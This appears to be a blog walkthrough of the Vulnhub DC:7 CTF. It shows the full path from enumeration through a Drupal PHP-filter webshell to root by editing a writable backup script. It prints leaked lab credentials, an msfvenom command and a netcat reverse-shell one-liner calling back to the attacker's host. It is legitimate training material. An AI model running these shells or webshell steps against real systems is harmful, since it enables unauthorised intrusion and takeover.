CTF Challenges

Dc:7 Vulnhub Walkthrough

DC:7 writeup, our other CTF challenges for CTF players and it can be download from vulnhub from here. The credit goes to “DCAU” for designing this VM machine for beginners. This is a Linux based CTF challenge where you can use your basic pentest skill to compromise this VM to escalate the root privilege shell.

Penetration Testing Methodologies

Network Scan

  • Nmap

Footprinting

Exploiting

  • SSH login
  • Abusing Drupal Drush
  • Compromising webshell via PHP Backdoor

Privilege Escalation

  • Abusing writable Script
  • Capture the Flag

Walkthrough

Network Scanning

Let’s start with a network scan using an aggressive Nmap scan as we always do, and this time also we will go with the same approach to identify open port for running services.

nmap -A 192.168.1.101

Hmmm! So nmap showed very exciting & cool outcome, specifically on port 80 that is accessible to HTTP service and is also used to operate drupal CMS, additionally, 15 submissions for robot.txt is like a cheery on a cake.

Enumeration

Further, we need to start enumeration against the host machine, therefore without wasting time, we navigate to a web browser for exploring HTTP service, and DC:7- Welcome page will be opened in the browser that gave us a hint to search “outside the box” and this hint might be connected with internet.

At the end of this web page, we observed another hint “@DC7User” which could be any possible username.

By considering the above-listed hint, we start footprinting on the @DC7-user and find the DC7-user twitter account. This account contains a link to GitHub: https:/github.com/Dc7User, maybe the author was pointing to this link.

And the github URL content a staffdb which is PHP repositories.

So when we have opened the staffdb, here config.php looks more interesting and a note i.e. as depicted below:

“This is some “code” (yes, it’s not the greatest code, but that wasn’t the point) for the DC-7 challenge.

This isn’t a flag, btw, but if you have made it here, well done anyway. :-)”

We found credential from inside config.php as shown below:

Username: dc7user
Password: MdR3xOgB7#dW

Exploiting

With the help of above-enumerated credential, we try to connect with ssh and after obtaining tty shell we go for post enumeration and start directory traversing.

ssh dc7user@192.168.1.101

At first, we’re looking for a directory list where we’ve found a “mbox” named file that contains an inbox message. The message contains /opt/script/backup.sh as the subject of the message, let’s explore more.

Inside backup.sh we notice it is using drush which stands for Drupal shell and it is a command-line utility that is used to communicate with drupal CMS.

So, I looked at the drush command on google and found a command that was used to change an account’s password.

Therefore, we try to change the admin password using the below command:

drush user-password admin --password=raj

Now, we’ve changed the password for the admin account to login to Drupal and explore the following URL:

http://192.168.1.101/user/login

After accessing the admin console, it was time to exploit web application by injecting malicious content inside it. Directly writing malicious scripts as web content will not give us the reverse shell of the application but after spending some time, we concluded that it requires PHP module. We, therefore, move to install new module through Manage>Extend>List>Install new module.

You can download the PHP package for Drupal from the URL below and upload the tar file to install the new module.

https://www.drupal.org/project/php

So, when the installation is completed, we need to enable to added module.

Again, move to Manage > Extend >filters and enable the checkbox for PHP filters.

Now use the Pentest monkey PHP script, i.e. “reverse shell backdoor.php” to be injected as a basic content. Don’t forget to add a “listening IP & port” to get a reversed connection. Continue to change the “text format to PHP” and enable the publishing checkbox. Keep the netcat listener ON in order to receive the incoming shell.

When everything is set correctly, click the preview button and you’ll get the reverse connection over the netcat.

Great!! we have our netcat session as www-data and if you will check permission on /opt/scripts/backup.sh, you will notice, that www-data has all permission to access or modify this file. We can therefore abuse the rights of the user file for escalating privileges by modifying the contents of the source.

Privilege Escalation

As said above we’ll try to abuse writable permission assign on the script. Thus, we use msfvenom to generate a malicious piece of code for obtaining the bash shell.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.106 lport=8888 R

Now copy the generated code and start another netcat listener on a new terminal.

mkfifo /tmp/ulgg; nc 192.168.1.106 8888 0</tmp/ulgg | /bin/sh >/tmp/ulgg 2>&1; rm /tmp/ulgg

Paste the code copied above in the previous netcat session under the www-data shell and wait for some time and get back to another netcat listener.

After some time, you will have access to the root shell, you will now get the final flag in the root directory as shown below.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here